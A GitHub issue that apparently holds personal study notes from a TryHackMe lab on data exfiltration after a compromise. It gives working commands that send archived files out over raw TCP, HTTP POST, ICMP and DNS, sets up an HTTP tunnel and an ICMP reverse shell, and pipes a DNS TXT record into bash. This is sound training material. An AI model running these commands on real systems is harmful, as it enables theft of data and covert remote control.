search

WDavid404 / Note_tryhackme

0 stars 0 forks source link

Post Compromise -- Data Exfiltration #13

Open WDavid404 opened 7 months ago

WDavid404 commented 7 months ago

数据渗漏,数据泄漏(Data Exfiltration)

How to use Data Exfiltration

There are three primary use case scenarios of data exfiltration, including:

WDavid404 commented 7 months ago

Exfiltration using TCP socket

If we are in a well-secured environment, then this kind of exfiltration is not recommended. This exfiltration type is easy to detect because we rely on non-standard protocols.

Besides the TCP socket, we will also use various other techniques, including data encoding and archiving. One of the benefits of this technique is that it encodes the data during transmission and makes it harder to examine.

The diagram shows that two hosts communicate over TCP on port 1337.

image

Steps:

  1. On the jump machine thm@jump-box$ nc -lvp 8080 > /tmp/task4-creds.data
  2. SSH to the victim machine from the jump machine. root@AttackBox$ ssh thm@MACHINE_IP -p 2022
  3. send data from the victim machine (we uses encode: base64) thm@victim1:$ tar zcf - <target dir>/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080
  4. On the jump machine, use 'dd' to decode data after receiving it. 
    
thm@jump-box:/tmp/$ dd conv=ascii if=task4-creds.data |base64 -d > task4-creds.tar
WDavid404 commented 7 months ago

Exfiltration using SSH

To transfer data over the SSH, we can use either the Secure Copy Protocol SCP or the SSH client.

In the case that we cannot use SCP, we will focus more on the SSH client. E.g. Exfiltration data from the victim1 machine thm@victim1:$ tar cf - <dir>/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -" SSH clients provide a way to execute a single command without having a full session "cd /tmp/; tar xpf - ", which is to change the directory and unarchive the passed file on the jump machine.

WDavid404 commented 7 months ago

Exfiltrate using HTTP(S)

思路: 1,在attacker server上搭建一个http或https的web server,它会处理过来的data request。 比如contact.php文件会把接收到的data保存为一个 tmp目录下的http.bs64 文件

<?php 
if (isset($_POST['file'])) {
        $file = fopen("/tmp/http.bs64","w");
        fwrite($file, $_POST['file']);
        fclose($file);
   }
?>

2,在Victim machine上执行 thm@victim1:~$ curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php

  1. 处理data文件 If you look closely at the http.bs64 file, you can see it is broken base64. This happens due to the URL encoding over the HTTP. The + symbol has been replaced with empty spaces, so let's fix it using the sed command as follows, Fixing the http.bs64 file: Using the sed command, we replaced the spaces with + characters to make it a valid base64 string! thm@web:~$ sudo sed -i 's/ /+/g' /tmp/http.bs64 then,decode the file 
    thm@web:~$ cat /tmp/http.bs64 | base64 -d | tar xvfz - tmp/task6/

HTTP Tunneling

Tunneling over the HTTP protocol technique encapsulates other protocols and sends them back and forth via the HTTP protocol. HTTP tunneling sends and receives many HTTP requests depending on the communication channel!

Case: image For HTTP Tunneling, we will be using a Neo-reGeorg tool to establish a communication channel to access the internal network devices. root@AttackBox:/opt/Neo-reGeorg# python3 neoreg.py generate -k thm The previous command generates encrypted Tunneling clients with thm key in the neoreg_servers/ directory. Note that there are various extensions available, including PHP, ASPX, JSP, etc. In our scenario, we will be uploading the tunnel.php file via the uploader machine.

Once we have uploaded the file, we can access it on the following URL: http://MACHINE_IP/uploader/files/tunnel.php. root@AttackBox:/opt/Neo-reGeorg# python3 neoreg.py -k thm -u http://MACHINE_IP/uploader/files/tunnel.php Once it is connected to the tunneling client, we are ready to use the tunnel connection as a proxy binds on our local machine, 127.0.0.1, on port 1080.

For example, if we want to access the app.thm.com, which has an internal IP address 172.20.0.121 on port 80, we can use the curl command with --socks5 argument. We can also use other proxy applications, such as ProxyChains, FoxyProxy, etc., to communicate with the internal network. 

root@AttackBox:~$ curl --socks5 127.0.0.1:1080 http://172.20.0.121:80
Welcome to APP Server!
WDavid404 commented 7 months ago

Exfiltration using ICMP

ICMP Data Section

On a high level, the ICMP packet's structure contains a Data section that can include strings or copies of other information, such as the IPv4 header, used for error messages. The following diagram shows the Data section, which is optional to use. image

Note that the Data field is optional and could either be empty or it could contain a random string during the communications. As an attacker, we can use the ICMP structure to include our data within the Data section and send it via ICMP packet to another machine.

Ping command on Linux

With the -p argument, we can specify 16 bytes of data in hex representation to send through the packet. Note that the -p option is only available for Linux operating systems.

Need to convert it to its Hex representation and then pass it to the ping command using -p options as follows:

root@AttackBox$ echo "thm:tryhackme" | xxd -p 
74686d3a7472796861636b6d650a

//xxd command to convert our string to Hex

Then we can use the ping command with the Hex value we got from converting the thm:tryhackme. root@AttackBox$ ping MACHINE_IP -c 1 -p 74686d3a7472796861636b6d650a

how to use Metasploit to exfiltrate data.

The Metasploit framework uses the same technique explained in the previous section. However, it will capture incoming ICMP packets and wait for a Beginning of File (BOF) trigger value. Once it is received, it writes to the disk until it gets an End of File (EOF) trigger value. The following diagram shows the required steps for the Metasploit framework. Since we need the Metasploit Framework for this technique, then we need the AttackBox machine to perform this attack successfully. image

step1:

msf5 > use auxiliary/server/icmp_exfil
msf5 auxiliary(server/icmp_exfil) > set BPF_FILTER icmp and not src ATTACKBOX_IP
BPF_FILTER => icmp and not src ATTACKBOX_IP

msf5 auxiliary(server/icmp_exfil) > set INTERFACE eth0
INTERFACE => eth0
msf5 auxiliary(server/icmp_exfil) > run

[*] ICMP Listener started on eth0 (ATTACKBOX_IP). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)

step2: ssh to then victim machine and use "nping" tool

thm@jump-box$ ssh thm@icmp.thm.com
thm@icmp-host:~# sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "admin1:password1"

Starting Nping 0.7.80 ( https://nmap.org/nping ) at 2022-04-25 23:23 EEST
SENT (0.0369s) ICMP [192.168.0.121 > ATTACKBOX_IP Echo request (type=8/code=0) id=7785 seq=1] IP [ttl=64 id=40595 iplen=39 ]
RCVD (0.0376s) ICMP [ATTACKBOX_IP > 192.168.0.121 Echo reply (type=0/code=0) id=7785 seq=1] IP [ttl=63 id=12656 iplen=39 ]
RCVD (0.0755s) ICMP [ATTACKBOX_IP > 192.168.0.121 Echo reply (type=0/code=0) id=7785 seq=1] IP [ttl=31 id=60759 iplen=32 ]

Max rtt: 38.577ms | Min rtt: 0.636ms | Avg rtt: 19.606ms
Raw packets sent: 1 (39B) | Rcvd: 2 (71B) | Lost: 0 (0.00%)
Nping done: 1 IP address pinged in 1.06 seconds

If everything is set correctly, the Metasploit framework should identify the trigger value and wait for the data to be written to disk. Let's start sending the required data and the end of the file trigger value from the ICMP machine. thm@icmp-host:~# sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "EOF"

ICMP C2 Communication

we will show executing commands over the ICMP protocol using the ICMPDoor tool. ICMPDoor is an open-source reverse-shell written in Python3 and scapy. The tool uses the same concept we discussed earlier in this task, where an attacker utilizes the Data section within the ICMP packet. The only difference is that an attacker sends a command that needs to be executed on a victim's machine. Once the command is executed, a victim machine sends the execution output within the ICMP packet in the Data section.

image

We needed for C2 communication over the ICMP protocol on JumpBox and the ICMP-Host machines.

  1. Run the icmpdoor command on the ICMP-Host Machine thm@icmp-host:~$ sudo icmpdoor -i eth0 -d 192.168.0.133
  2. On the jumpbox 
    
thm@jump-box$  sudo icmp-cnc -i eth1 -d 192.168.0.121
shell: hostname
hostname
shell: icmp-host

[*]we requested to execute the hostname command, and we received icmp-host (hostname命令在victim machine上的执行结果)

WDavid404 commented 7 months ago

Exfiltration using DNS

Since DNS is not a transport protocol, many organizations don't regularly monitor the DNS protocol! The DNS protocol is allowed in almost all firewalls in any organization network. For those reasons, threat actors prefer using the DNS protocol to hide their communications.

The DNS protocol has limitations that need to be taken into consideration, which are as follows,

Based on these limitations, we can use a limited number of characters to transfer data over the domain name. If we have a large file, 10 MB for example, it may need more than 50000 DNS requests to transfer the file completely. Therefore, it will be noisy traffic and easy to notice and detect.

image

  1. An attacker registers a domain name, for example, tunnel.com
  2. The attacker sets up tunnel.com's NS record points to a server that the attacker controls.
  3. The malware or the attacker sends sensitive data from a victim machine to a domain name they control—for example, passw0rd.tunnel.com, where passw0rd is the data that needs to be transferred.
  4. The DNS request is sent through the local DNS server and is forwarded through the Internet.
  5. The attacker's authoritative DNS (malicious server) receives the DNS request.
  6. Finally, the attacker extracts the password from the domain name.

When do we need to use the DNS Data Exfiltration?

There are many use case scenarios, but the typical one is when the firewall blocks and filters all traffic. We can pass data or TCP/UDP packets through a firewall using the DNS protocol, but it is important to ensure that the DNS is allowed and resolving domain names to IP addresses.

DNS Data Exfiltration

image Note:we must keep the whole URL under 255 characters, and each subdomain label can't exceed 63 characters. 

thm@victim2:~$ cat task9/credit.txt | base64 | tr -d "\n"| fold -w18 | sed -r 's/.*/&.att.tunnel.com/' 
TmFtZTogVEhNLXVzZX.att.tunnel.com
IKQWRkcmVzczogMTIz.att.tunnel.com
NCBJbnRlcm5ldCwgVE.att.tunnel.com
hNCkNyZWRpdCBDYXJk.att.tunnel.com
OiAxMjM0LTEyMzQtMT.att.tunnel.com
IzNC0xMjM0CkV4cGly.att.tunnel.com
ZTogMDUvMDUvMjAyMg.att.tunnel.com
pDb2RlOiAxMzM3Cg==.att.tunnel.com

[*] tr: 替换指定的字符;或者删除指定的字符(需要-d option)
[*] fold: 把文件按照指定的幅度进行换行
[*] sed -r 正规表达式

Another way: This time, we split every 18 characters with a dot "." and add the name server, then use the dig command to send it over the DNS

thm@victim2:~$ cat task9/credit.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/att.tunnel.com/ | awk '{print "dig +short " $1}' | bash

C2 Communications over DNS

C2 frameworks use the DNS protocol for communication, such as sending a command execution request and receiving execution results over the DNS protocol. They also use the TXT DNS record to run a dropper to download extra files on a victim machine. This section simulates how to execute a bash script over the DNS protocol. We will be using the web interface to add a TXT DNS record to the tunnel.com domain name.

思路:把一个script脚本(encode处理过)放在TXT DNS record里,然后让victim machine去用dig命令访问domain从而获得script内容(当然对得到的script内容进行字符处理和decode) image thm@victim2$ dig +short -t TXT script.tunnel.com | tr -d "\"" | base64 -d | bash

DNS Tunneling (TCPoverDNS)

Steps:

Tool:iodine

https://code.kryo.se/iodine/ iodine lets you tunnel IPv4 data through a DNS server. This can be usable in different situations where internet access is firewalled, but DNS queries are allowed.